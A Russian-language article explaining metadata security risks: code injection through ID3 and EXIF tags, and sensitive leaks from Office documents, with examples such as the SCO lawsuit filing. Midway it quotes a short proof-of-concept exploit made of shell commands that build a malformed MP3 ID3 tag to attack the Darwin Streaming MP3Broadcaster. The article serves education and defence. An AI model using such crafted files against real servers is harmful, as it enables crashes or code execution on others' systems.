Безопасность метаданных

ALiEN Assault
[ alien.at.packetattack.dot.net ]

Метаданные - данные о данных, другими словами - служебная информация, содержащаяся в документах различных форматов. В этой статье будут рассмотрены аспекты безопасности метаданных: связанные с ними риски и использование метаданных в практике информационной безопасности.

Метаданные нередко помещаются в документ программным или аппаратным средством, при помощи которого документ был создан. Так как этот процесс автоматизирован, пользователь может оставаться неосведомленным о наличии таких данных, и не предпринимать мер для защиты этой информации, нередко чувствительной.

Среди типов документов, содержащих метаданные - документы Microsoft Office, Adobe PDF, Corel WordPerfect, изображения, созданные CorelDRAW, Adobe Photoshop, созданные или обработанные различными редакторами растровой графики файлы GIF и JPEG, аудиофайлы MP3, веб-страницы, электронные письма. Получившие массовое распространение форматы, используемые на различных платформах в повседневной деятельности.

Метаданные могут включать в себя имя автора документа, организацию, метку программного или аппаратного средства, историю модификаций документа и так далее. В особо тяжелых случаях (Microsoft Word) это может быть даже текст, некогда входивший в документ, но позже удаленный , однако хранящийся в виде метаданных. Характерным примером аппаратной метки может служить EXIF тэг, помещаемый в снимок в формате JPEG цифровыми камерами и несущий, среди прочих, такие данные как время и режим съёмки кадра. Другой интересный пример аппаратного размещения метаданных упоминался не так давно в PC World и на SecurityLab.ru; речь идёт о нанесении цветными лазерными принтерами метки на распечатке. Метаданные могут присутствовать и в исходном коде в виде комментариев разработчиков, и в исполняемых файлах (ресурс Version, метка упаковщика и так далее).

Риски

Риски, возникшие в связи с применением метаданных, можно поделить на две основные группы: внедрение кода и раскрытие чувствительной информации.

Мета-тэги, такие как ID3 у MP3 файлов, EXIF у JPEG и другие, представляют возможность внедрения потенциально опасного кода. Это может быть и кросс-скриптинг (в данном контексте представляется уместным использование обозначения XDS, или cross-document scripting), и исполняемый код, и средства сбора информации о целевой системе. В цепи передачи и обработки информации добавляется уязвимое звено - способ обработки метаданных программным средством чтения или индексирования документов.

В качестве примера можно привести уязвимость в ImageMagick < 6.1.2 (Secunia Advisory SA12995, CAN-2004-0981) - ошибку в обработке EXIF тэгов, которая приводила к угрозе выполнения кода, внедренного в EXIF. Уязвимости, связанные с обработкой метаданных, обнаруживались и в таких популярных мультимедиа-проигрывателях, как Winamp, RealPlayer, mpg321.

Ниже приводится пример PoC-эксплойта, основанного на уязвимости в обработке ID3 тэгов Apple QuickTime/Darwin Streaming MP3Broadcaster :

 proof of concept by Sir Mordred : 

First create the sample configuration file: 
$ echo -e "\n" > test.conf 

Then create a playlist file: 
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply 

Create a specially crafted mp3 file: 
$ echo -e  "ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\
xaa\xaa\xbb\x00\x00\x00\x00\x00\x00 " > song.mp3 

Следует отметить, что уязвимости в обработке метаданных ещё недостаточно исследованы. С общим гигантским возрастанием объемов информации метаданные получат всё большее распространение как средство индексирования данных; как результат, возникнут и новые (или будут обнаружены уже существующие) уязвимости, разработана методология внедрения кода.

К другой группе рисков относится раскрытие информации, содержащейся среди метаданных. Это может быть конфиденциальная, или относящаяся к коммерческой тайне информация, адреса электронной почты, пути к файлам на системе, на которой был создан либо обработан документ, другая информация об авторе и его программном и аппаратном обеспечении.

Утечка информации через метаданные в документах Microsoft Office дала основу некоторым инцидентам, получившим международную огласку. В одном случае, это был документ, подписанный премьер-министром Великобритании Тони Блэром, и касавшийся ситуации в Ираке. Исследование файла показало удаленный из него текст, содержавший информацию, не предназначенную для открытого доступа. Другой случай дополнил собой обширную летопись тяжбы SCO ко множеству компаний. Анализ искового заявления, составленного юридической компанией Boies, Schiller & Flexner, представляющей интересы SCO, показал, что из текста удалено название Bank of America - следовательно, банк был одной из мишеней иска, но по каким-то причинам юристы SCO воздержались от предъявления претензий к банку. Для сведущего и заинтересованного человека это - важная и обширная информация.

На изображении - результаты анализа файла от Boies, Schiller & Flexner.

Метаданные и практика информационной безопасности.

Не стоит обходить вниманием и прямое назначение метаданных - индексирование больших объёмов информации. Так, упоминавшееся выше уведомление от Secunia имеет по меньшей мере два индекса: SA12995 (индекс Secunia) и CAN-2004-0981 (индекс уязвимости в CVE). Создано специфическое обеспечение, предназначеннное для аудита и контроля метаданных в организациях с объёмным документооборотом, такое как ezClean и WorkShare Protect.

Исследование метаданных играет не последнюю роль в расследованиях случаев нарушений авторских прав, выявлении плагиата или попыток фальсификации документов. Известен факт использования EXIF тэга в качестве улики в уголовном деле.

Анализ метаданных уже стал повседневной практикой для юристов развитых стран. К сожалению, в России вопрос безопасности метаданных пока остаётся в лучшем случае открытым, скорее - ещё не поставленным должным образом.

Ресурсы:

Симон Байерс, "Утечка данных через скрытые тексты в опубликованных документах" - http://www.osp.ru/os/2004/05/053.htm Ресурс, посвященный рискам, связанным с метаданными - http://www.metadatarisk.org